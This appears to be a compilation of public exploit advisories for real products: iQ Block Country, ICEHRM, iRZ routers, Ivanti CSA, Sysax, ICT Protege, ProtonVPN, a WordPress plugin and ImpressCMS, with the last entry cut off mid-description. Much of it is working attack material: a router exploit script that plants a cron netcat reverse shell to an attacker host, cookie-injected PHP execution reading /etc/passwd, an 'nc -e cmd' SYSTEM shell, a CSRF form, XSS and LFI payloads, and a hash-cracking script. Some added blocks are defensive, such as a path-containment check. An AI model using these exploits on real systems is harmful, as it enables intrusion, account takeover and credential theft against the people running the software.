# Software Link: https://en-gb.wordpress.org/plugins/iq-block-country/
# Version: 1.2.13
# Tested on: Linux
# CVE: CVE-2022-0246 (https://wpscan.com/vulnerability/892802b1-26e2-4ce1-be6f-71ce29687776)

# Description:
iQ Block Country is a WordPress plugin that limits access to your website content: it allows or disallows visitors from defined countries to (parts of) the content of the website. The plugin's settings can be exported or imported using its backup functionality, and an authorized user can import preconfigured settings by uploading a zip file. After the upload, the files in the zip are extracted one by one. Before each file is extracted, the plugin checks whether a file with that name already exists and, if so, deletes it, using the entry name from the archive as-is and without checking that the resolved path stays inside the upload directory. Because an entry name may contain ../ segments, this is a "Zip Slip" condition. Zip Slip is usually used to overwrite configuration files or other sensitive resources; here the pre-extraction delete lets an attacker delete an arbitrary file on the server (any file the web server user may remove) simply by uploading a zip containing an entry whose name is the relative path of the file to delete. The details of the discovery are given below.

# Steps To Reproduce:
1. Install and activate the iQ Block Country plugin.
2. Create a test file on the vulnerable system (e.g. /var/www/html/test.txt).
3. Create a zip file containing a file named ../../../../test.txt. The absolute path at the end of this process will be /var/www/html/wp-content/uploads/2022/01/../../../../test.txt, which resolves to /var/www/html/test.txt. The number of ../ segments depends on the year/month uploads subdirectory in use on the target.
4. Go back to WordPress and visit Settings > iQ Block Country > Import/Export tab.
5. Click the "Browse" button and choose the zip file created in step 3.
6. Click the "Restore settings" button.
7. An "Invalid file" message appears; ignore it and check whether test.txt has been deleted.
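Both the Tiny File Manager `fullpath` field (a `../../../../../../../..${webroot}/shell.php` value in a multipart upload) and the zip entry name in the steps above are the same defect: a user-supplied path is joined onto a base directory and used without checking that the result still lies inside that directory. The block below is an added example, not code from either advisory or either project: it lays out a constructed fake webroot in a temporary directory, builds the zip in memory with `zipfile.writestr` (which keeps `../` in entry names, unlike most zip command-line tools), runs the flawed "check existence, then delete" loop against it, and then runs the same loop with a realpath-based containment check. The helper is also applied to a Tiny File Manager style `fullpath` value. Directory names and the `settings.json` entry are assumptions for the demo.

```python
"""Path containment for user-controlled destinations (added example)."""
import io
import os
import tempfile
import zipfile


def resolve_inside(base_dir, user_path):
    """Return the absolute destination for user_path if it stays inside base_dir, else None.

    os.path.realpath normalises '..' segments and resolves symlinks, so the check
    holds even when base_dir itself contains a symlinked component."""
    base = os.path.realpath(base_dir)
    # join() would discard base for an absolute user_path; strip leading separators so
    # every supplied name is interpreted relative to base
    candidate = os.path.realpath(os.path.join(base, user_path.lstrip("/\\")))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def vulnerable_delete_on_extract(zip_bytes, upload_dir):
    """Mimics the flawed loop: existence check and delete keyed only on the entry name."""
    deleted = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            target = os.path.join(upload_dir, name)   # no containment check
            if os.path.exists(target):
                os.remove(target)
                deleted.append(os.path.realpath(target))
    return deleted


def safe_extract(zip_bytes, upload_dir):
    """Same loop with the containment check; returns (extracted, rejected) entry names."""
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            dest = resolve_inside(upload_dir, info.filename)
            if dest is None:
                rejected.append(info.filename)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with open(dest, "wb") as out:
                out.write(zf.read(info))
            extracted.append(info.filename)
    return extracted, rejected


def build_zip(entries):
    """Construct a zip in memory; writestr stores entry names verbatim, '../' included."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def demo():
    """Lay out a constructed webroot and run both extractors; returns what each did."""
    root = tempfile.mkdtemp()
    webroot = os.path.join(root, "var", "www", "html")
    upload_dir = os.path.join(webroot, "wp-content", "uploads", "2022", "01")
    os.makedirs(upload_dir)
    victim = os.path.join(webroot, "test.txt")
    with open(victim, "w") as f:
        f.write("keep me\n")

    # the entry name climbs four levels from uploads/2022/01 up to the webroot
    zip_bytes = build_zip({"../../../../test.txt": b"x", "settings.json": b"{}"})

    deleted = vulnerable_delete_on_extract(zip_bytes, upload_dir)
    victim_gone = not os.path.exists(victim)

    # recreate the victim file and run the hardened loop on the same archive
    with open(victim, "w") as f:
        f.write("keep me\n")
    extracted, rejected = safe_extract(zip_bytes, upload_dir)

    # the Tiny File Manager style fullpath value, checked with the same helper
    fullpath = "../../../../../../../.." + webroot + "/shell.php"
    return {
        "deleted": deleted,
        "victim_gone_after_vulnerable": victim_gone,
        "victim_present_after_safe": os.path.exists(victim),
        "extracted": extracted,
        "rejected": rejected,
        "fullpath_allowed": resolve_inside(upload_dir, fullpath) is not None,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The check compares resolved paths rather than looking for `..` substrings, so encoded or symlinked variants fail the same way; the one design decision worth noting is that an absolute entry name is treated as relative to the base (as `zipfile.extract` does) instead of being rejected outright.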
-
ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
# Date: 18/03/2022
# Exploit Author: Devansh Bordia
# Vendor Homepage: https://icehrm.com/
# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS
# Version: 31.0.0.OS
# Tested on: Windows 10

1. About - ICEHRM

IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.

2. Description:

The application's update-password feature is vulnerable to CSRF: the password change is performed by a GET request that carries no CSRF token, so an attacker who gets a logged-in user to load a crafted page can change that user's password and take over the account.

3. Steps To Reproduce:

- Using the admin user, create a user named Gaurav with the Employee permission and set his password.
- Log in to the application with his credentials and navigate to the Update Password feature to change the password.
- Intercept the request in a proxy: the password is changed by a GET request and no CSRF token is used.
- In Burp Suite, generate a CSRF PoC for this request and save it as exploit.html.
- Change the password in the PoC to any password you want.
- Open the PoC in the same browser session and click the submit button.
- When trying to log in again, the password has been reset for the account, leading to account takeover.

4. Vulnerable Request:

GET /app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123 ","pwd":"Dummy@123"} HTTP/1.1
Host: localhost:8070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information
Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Note that the request also carries the victim's current password in the "current" field of the req parameter; if the server verifies that value, the attacker must know it for the forged request to succeed.

5. Exploit POC (exploit.html)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8070/app/service.php">
      <input type="hidden" name="t" value="Employee" />
      <input type="hidden" name="a" value="ca" />
      <input type="hidden" name="sa" value="changePassword" />
      <input type="hidden" name="mod" value="modules=employees" />
      <!-- the double quotes of the JSON value must be entity-encoded inside the attribute -->
      <input type="hidden" name="req" value="{&quot;current&quot;:&quot;Test@123&quot;,&quot;pwd&quot;:&quot;Dummy@123&quot;}" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
iRZ Mobile Router - CSRF to RCE
# Exploit Title: iRZ Mobile Router - CSRF to RCE
# Google Dork: intitle:"iRZ Mobile Router"
# Date: 2022-03-18
# Exploit Author: Stephen Chavez & Robert Willis
# Vendor Homepage: https://en.irz.ru/
# Software Link: https://github.com/SakuraSamuraii/ez-iRZ
# Version: Routers through 2022-03-16
# Tested on: RU21, RU21w, RL21, RU41, RL01
# CVE : CVE-2022-27226

import os
import requests
import json
import subprocess

option = "0"


def main():
    print("####################################################")
    print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")
    print("####################################################")
    print()
    print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")
    print()
    print("1. Post Authentication RCE (Needs Credentials)")
    print("2. CSRF to RCE (No Credentials)")
    print()
    runit()


def runit():
    option = input("Select an option: ")
    if option == "1":
        exploit1()
    elif option == "2":
        exploit2()
    else:
        print("You must select '1' or '2'. Exiting.")


def exploit1():
    print("## Running Post Auth RCE exploit")
    print()
    print()
    router_ip = input("## Enter the router ip to exploit: ")
    router_port = int(input("## Enter the victim router web page port (default is 80): ") or "80")
    router_user = input("## Enter the username for the router login: ")
    router_pass = input("## Enter the password for the router login: ")
    LHOST = input("## Enter the LHOST for the router reverse shell: ")
    LPORT = input("## Enter the LPORT for the router reverse shell: ")
    router_url = f'http://{router_ip}:{router_port}'
    nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'
    input(nc1_str + "\n\nPress enter once you do")
    send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)


def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):
    intro = f'Sending the payload to {router_url}\n'
    print(intro)
    # Crontab entry that fires every minute: a named-pipe reverse shell to LHOST:LPORT.
    # /api/crontab takes the job list as JSON and does not check a CSRF token.
    payload_str = ('{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*",'
                   '"command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' +
                   f'{lhost_ip} {lhost_port} ' +
                   '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}')
    payload_json = json.loads(payload_str)
    s = requests.Session()
    s.auth = (router_user, router_pass)
    s.headers.update({"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"})
    s.headers.update({"X-Requested-With": "XMLHttpRequest"})
    s.headers.update({"Origin": router_url})
    s.headers.update({"Referer": router_url})
    s.post(router_url + "/api/crontab", json=payload_json)
    exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'
    print("Request sent! You may have to wait about 2 minutes to get a shell. \n"
          "First shell will die due to crontab job. Start a new listener on a new port [e.g. 443], "
          "and run the following command: " + exploit_str)
    print("To fix TTY: type telnet 0.0.0.0 in the shell")


def exploit2():
    print("## Running CSRF to RCE exploit")
    print()
    print()
    router_ip = input("## Enter the router ip to exploit: ")
    router_port = int(input("## Enter the victim router web page port (default is 80): ") or "80")
    LHOST = input("## Enter the LHOST for the router reverse shell: ")
    LPORT = input("## Enter the LPORT for the router reverse shell: ")
    load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)


def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):
    # Locate the template next to this script. The original concatenated
    # os.path.dirname(__file__) + os.sep, which becomes "/poc.template.html"
    # when the script is started from its own directory.
    script_dir = os.path.dirname(os.path.abspath(__file__))
    file_path = os.path.join(script_dir, "poc.template.html")
    if os.path.isfile(file_path):
        with open(file_path) as poc_file:
            original_poc_data_str = poc_file.read()
        new_html = original_poc_data_str.replace("{router_ip}", router_ip)
        new_html = new_html.replace("{router_port}", str(router_port))
        lhost_split_arr = lhost_ip.split(".")
        if len(lhost_split_arr) == 4:
            # The template takes the LHOST one octet at a time
            new_html = new_html.replace("{lhost_ip_octect_1}", lhost_split_arr[0])
            new_html = new_html.replace("{lhost_ip_octect_2}", lhost_split_arr[1])
            new_html = new_html.replace("{lhost_ip_octect_3}", lhost_split_arr[2])
            new_html = new_html.replace("{lhost_ip_octect_4}", lhost_split_arr[3])
            new_html = new_html.replace("{lhost_port}", lhost_port)
            new_file_path = os.path.join(script_dir, "poc.new.html")
            try:
                with open(new_file_path, 'w') as new_file:
                    new_file.write(new_html)
                print()
                print(f'New file written to {new_file_path}. Host this file')
            except FileNotFoundError:
                print("You had an error writing to the file, doesn't exist.")
        else:
            print(f'{lhost_ip} is not a proper IPV4 address.')
    else:
        print(f'{file_path} not found')


main()
-
Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
# Date: 20/03/2022
# Exploit Author: d7x
# Vendor Homepage: https://www.ivanti.com/
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
# Version: CSA 4.6 4.5 - EOF Aug 2021
# Tested on: Linux x86_64
# CVE : CVE-2021-44529

### This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US
Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies
@d7x_real https://d7x.promiselabs.net https://www.promiselabs.net
###

The `exec` cookie carries base64-encoded PHP source that the appliance evaluates; command output comes back between <c123> tags, which the grep extracts.

# cat /etc/passwd   (exec = base64 of  system("cat /etc/passwd");)
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo

# sleep for 10 seconds   (exec = base64 of  sleep(10);)
curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo
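The two curl commands above hide what is actually being sent: the `exec` cookie is plain base64 of PHP source, and the `tr | grep` pipeline extracts whatever the appliance printed between `<c123>` tags. The helper below is an added example (not the exploit author's code) that builds and decodes that cookie from readable PHP and reproduces the output extraction in Python. The `run_php()` sender assumes the same `/client/index.php` endpoint and cookie layout as the advisory; the HTTP response used for the offline demo is constructed, not captured from a real appliance.

```python
import base64
import re
import ssl
from urllib.request import Request, urlopen


def build_cookie(php_code: str) -> str:
    """Cookie header value in the advisory's layout, with exec= set to base64(php_code)."""
    exec_b64 = base64.b64encode(php_code.encode()).decode()
    return f"e=ab; exec={exec_b64}; pwn=; LDCSASESSID="


def decode_cookie(cookie: str) -> str:
    """Recover the PHP source from an exec= cookie (what the advisory's opaque strings contain)."""
    m = re.search(r"exec=([A-Za-z0-9+/=]+)", cookie)
    if not m:
        raise ValueError("no exec= field in cookie")
    return base64.b64decode(m.group(1)).decode()


def extract_output(body: str, join_lines: bool = True) -> str:
    """Python equivalent of:  tr -d "\\n" | grep -zPo '<c123>\\K.*?(?=</c123>)'
    join_lines=True mirrors the tr step exactly (newlines inside the output are lost);
    join_lines=False keeps them, which is usually what you want for multi-line output."""
    text = body.replace("\n", "") if join_lines else body
    m = re.search(r"<c123>(.*?)</c123>", text, re.S)
    return m.group(1) if m else ""


def run_php(base_url: str, php_code: str, insecure: bool = True, timeout: int = 15) -> str:
    """Live sender (assumption: same endpoint as the advisory). insecure=True matches curl -k."""
    ctx = ssl.create_default_context()
    if insecure:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = Request(base_url.rstrip("/") + "/client/index.php",
                  headers={"Cookie": build_cookie(php_code)})
    with urlopen(req, context=ctx, timeout=timeout) as resp:
        return extract_output(resp.read().decode(errors="replace"), join_lines=False)


# Constructed sample response (not captured from a real appliance) for the offline demo
SAMPLE_BODY = ("<html>\n<c123>root:x:0:0:root:/root:/bin/bash\n"
               "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</c123>\n</html>")

if __name__ == "__main__":
    print(decode_cookie("e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID="))
    print(build_cookie("sleep(10);"))
    print(extract_output(SAMPLE_BODY, join_lines=False))
```

For a time-based sanity check against a live host, send `sleep(10);` via `run_php()` and compare wall-clock time against a baseline request, exactly as the second curl command does.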
-
Sysax FTP Automation 6.9.0 - Privilege Escalation
# Exploit Author: bzyo (@bzyo_)
# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation
# Date: 03-20-2022
# Vulnerable Software: Sysax FTP Automation 6.9.0
# Vendor Homepage: https://www.sysax.com/
# Version: 6.9.0
# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi
# Tested on: Windows 10 x64

# Details:
The Sysax Scheduler Service runs as Local System. By default the application lets low-privilege users create and run backup jobs, and when the option to run the job as the current user (or another user) is removed, the task runs as the service account. A low-privilege user can abuse this to escalate to Local System.

# Prerequisites:
To exploit this vulnerability, an attacker must already have local access, as a low-privileged user, to a system running Sysax FTP Automation.

# Exploit:
Logged in as the low-privileged account:
1. Create folder c:\temp
2. Download netcat (nc.exe) to c:\temp
3. Create file 'pwn.bat' in c:\temp with contents:
   c:\temp\nc.exe localhost 1337 -e cmd
4. Open a command prompt and start a netcat listener:
   nc -nlvvp 1337
5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation
6. Select Setup Scheduled/Triggered Tasks
   - Add task (Triggered)
   - Update folder to monitor to be c:\temp
   - Check 'Run task if a file is added to the monitor folder or subfolder(s)'
   - Choose 'Run any other Program' and choose c:\temp\pwn.bat
   - Uncheck 'Login as the following user to run task'
   - Finish and Save
7. Create a new text file in c:\temp
8. Check the netcat listener:
   C:\WINDOWS\system32>whoami
   whoami
   nt authority\system
-
ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
# Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm

Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
                      Lib: 04.00.217
                      Int: 2.3.235.J013
                      OS: 2.0.20
                  WX: Ver: 4.00 284 H062
                      App: 02.08.766
                      Lib: 04.00.169
                      Int: 02.2.208

Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system.

Desc: The application suffers from an authenticated stored XSS vulnerability. The issue is triggered when input passed to the 'Name' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Tested on: Microsoft-WinCE/6.00

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5699
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php

08.02.2022

--

UI navigation:
--------------
Scheduling > Daylight Savings > (Name field).

Decrypted POST request:
-----------------------
POST /daylightsaving.htm
Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1

Encrypted GET request:
----------------------
http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll
[remainder of the encrypted request not preserved on this page]

Additional info:
----------------
Database backup predictable name: Db_D3037E8A_8_Feb_22.bak
The D3037E8A is the serial number of the onboard reader.

Encrypt/Decrypt functions:
--------------------------
The request body is AES-128-CBC encrypted in the browser with a key that the page itself stores in localStorage ("WXKey"), and a random 16-character IV is prepended to the ciphertext before hex encoding. Anyone who can read localStorage (or the client-side script) can therefore encrypt and decrypt requests at will; the scheme is obfuscation, not a security boundary.

From console:
> localStorage.getItem("WXKey")
< '8EDB22D9FB767538'

function encryptAES(a, c) {
    a = a.toString();
    a = unescape(encodeURIComponent(a));
    "undefined" == typeof c && (c = !0);
    if (0 == servertype) return a;
    var b = localStorage.getItem("WXKey");
    if ("" == b || null == b) return a;
    for (var d = "", e = 0; 16 > e; e++) d += String.fromCharCode(Math.floor(75 * Math.random() + 48));
    a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc");
    return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a)
}

function decryptAES(a) {
    if (null == a) return "";
    a = a.toString();
    if ("<invalid session> < Packet not Init and not encrypted. >" == a) a = 0 == servertype ? "login.php" : "login.htm", window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
    else if ("<invalid session>" == a.substr(0, 17)) a = 0 == servertype ? "login.php?logout" : "login.htm?logout", window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
    else {
        if (0 == servertype) return a;
        var c = localStorage.getItem("WXKey");
        if ("" == c) return a;
        a = hexToStr(a);
        var b = a.substr(0, 16);
        a = a.substr(16, a.length);
        a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, "");
        a = removePKCS7(a);
        return a = decodeURIComponent(escape(a))
    }
}
-
ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
# Exploit Author: LiquidWorm

Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
                      Lib: 04.00.217
                      Int: 2.3.235.J013
                      OS: 2.0.20
                  WX: Ver: 4.00 284 H062
                      App: 02.08.766
                      Lib: 04.00.169
                      Int: 02.2.208

Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system.

Desc: The application is vulnerable to improper access control that allows an authenticated operator to disclose the SHA1 password hashes (client-side) of other users/operators.

Tested on: Microsoft-WinCE/6.00

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5700
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php

08.02.2022

--

Navigate to http://CONTROLLER_IP/operator.htm

Source:

<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly="">
<input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
...
...
<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
...
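Why a hash in a hidden form field matters: if, as the field name suggests, `pswdsha` is a plain SHA-1 of the operator's password with no salt, any operator who can view operator.htm can pull every colleague's hash and run an offline dictionary attack against it. The script below is an added example (not part of the advisory) that extracts `pswdsha` values from page source with the standard-library HTML parser and checks them against a wordlist. The hash from the advisory is used only to show extraction; the page, password and wordlist used for the cracking demo are constructed here, since the real password behind the advisory's hash is unknown.

```python
import hashlib
from html.parser import HTMLParser


class HiddenHashParser(HTMLParser):
    """Collect the value of every <input type="hidden" id="pswdsha"> in a page."""

    def __init__(self):
        super().__init__()
        self.hashes = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden" and a.get("id") == "pswdsha":
            self.hashes.append((a.get("value") or "").strip().lower())


def extract_pswdsha(html: str) -> list:
    """All pswdsha hashes found in the HTML, in document order."""
    p = HiddenHashParser()
    p.feed(html)
    return p.hashes


def crack_sha1(digest: str, wordlist) -> str:
    """Offline dictionary attack on an unsalted SHA-1; returns the password or None."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.sha1(word.encode()).hexdigest() == digest:
            return word
    return None


# Snippet taken from the advisory's operator.htm source
ADVISORY_SNIPPET = '<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">'

# Constructed demo page: we know its password because we built the hash ourselves
CONSTRUCTED_PASSWORD = "Pr0tege!"
CONSTRUCTED_PAGE = (
    '<p><label id="OperatorPassword">Password</label>'
    '<input type="password" id="Password" value="" class="narrow" readonly=""></p>'
    f'<input type="hidden" id="pswdsha" value="{hashlib.sha1(CONSTRUCTED_PASSWORD.encode()).hexdigest()}">'
)
CONSTRUCTED_WORDLIST = ["admin", "password", "123456", "Pr0tege!", "ict2022"]

if __name__ == "__main__":
    for h in extract_pswdsha(CONSTRUCTED_PAGE):
        print(h, "->", crack_sha1(h, CONSTRUCTED_WORDLIST))
```

Against a real controller, feed the fetched operator.htm body to `extract_pswdsha()` and a proper wordlist (or hashcat mode 100) to the cracking step; the point of the demo is that no interaction with the controller is needed once the hash has been read.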
-
ProtonVPN 1.26.0 - Unquoted Service Path
# Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path
# Date: 22/03/2022
# Exploit Author: gemreda (@gemredax)
# Vendor Homepage: https://protonvpn.com/
# Software Link: https://protonvpn.com/
# Version: 1.26.0
# Tested: Windows 10 x64
# Contact: [email protected]

PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ProtonVPN Wireguard
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ProtonVPN WireGuard
        DEPENDENCIES       : Nsi
                           : TcpIp
        SERVICE_START_NAME : LocalSystem

#Exploit:
The service binary path contains spaces but is not quoted (CWE-428). Because the service runs as LocalSystem, Windows resolves the image path token by token, so a file such as "C:\Program.exe" placed in a parent directory would be started with SYSTEM privileges instead of the intended binary. In practice this requires write access to C:\ or to C:\Program Files (x86)\, which a standard user does not have by default; the service is DEMAND_START, so the planted binary runs the next time the service is started.
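The unquoted path above is only exploitable if one of the intermediate candidates is writable, so the first thing to do is enumerate exactly which paths Windows will try. The function below is an added example (not the advisory author's code) that implements the CreateProcess resolution rule from the Windows documentation: each whitespace-delimited prefix of the command line is tried as the image name, `.exe` is appended when the prefix has no extension, and resolution stops at the first token that is the real executable. The `sc qc` output from the advisory is the sample input; the writability check is only meaningful when run on the affected Windows host.

```python
import ntpath
import os


def hijack_candidates(binary_path_name: str) -> list:
    """Image paths CreateProcess tries, in order, for an unquoted BINARY_PATH_NAME.
    Returns [] for a quoted path, which is not affected."""
    s = binary_path_name.strip()
    if s.startswith('"'):
        return []
    candidates = []
    start = 0
    while True:
        cut = s.find(" ", start)
        prefix = s if cut == -1 else s[:cut]
        # No extension on the token: Windows appends .exe (C:\Program -> C:\Program.exe)
        name = prefix if ntpath.splitext(prefix)[1] else prefix + ".exe"
        candidates.append(name)
        if prefix.lower().endswith(".exe") or cut == -1:
            break          # reached the real image; later tokens are arguments
        start = cut + 1
    return candidates


def writable_hijack_dirs(binary_path_name: str) -> list:
    """Candidate paths whose parent directory the current user can write to.
    Only meaningful on the Windows host being assessed; elsewhere it returns []."""
    out = []
    for cand in hijack_candidates(binary_path_name)[:-1]:   # skip the legitimate image
        parent = ntpath.dirname(cand)
        if parent and os.name == "nt" and os.access(parent, os.W_OK):
            out.append(cand)
    return out


# BINARY_PATH_NAME from the advisory's sc.exe qc output
PROTONVPN_PATH = (r"C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe"
                  r" C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf")

if __name__ == "__main__":
    for c in hijack_candidates(PROTONVPN_PATH):
        print(c)
    print("writable:", writable_hijack_dirs(PROTONVPN_PATH))
```

On a real assessment, run `writable_hijack_dirs()` as the low-privileged user; if it returns an empty list the finding is a weakness, not a working privilege escalation.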
-
WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
# Date: 23-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
# Version: 3.7.3
# Tested on: Firefox
# Vulnerable File: dispatcher.php

# Vulnerable Code: the `open` parameter is appended to the plugins directory and passed straight to include(), so `../` sequences reach any readable file on the server.

```php
if ( isset($_GET['open']) ) {
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '
    <div id="welcome-panel" class="welcome-panel" style="padding-bottom: 20px;">
    <div class="welcome-panel-column-container">';
    include_once( ABSPATH . WPINC . '/feed.php' );
```

# Proof of Concept:
localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]
-
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE)
# Exploit Author: Egidio Romano aka EgiX
# Date: 30/03/2022
# Version: <= 1.4.2
# Vendor: https://www.impresscms.org
# CVE: CVE-2021-26599

<?php

/*
    ----------------------------------------------------------
    ImpressCMS <= 1.4.2 SQL Injection to Remote Code Execution
    ----------------------------------------------------------

    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://www.impresscms.org

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    User input passed through the "groups" POST parameter to the /include/findusers.php
    script is not properly sanitized before being passed to the
    icms_member_Handler::getUserCountByGroupLink() and icms_member_Handler::getUsersByGroupLink()
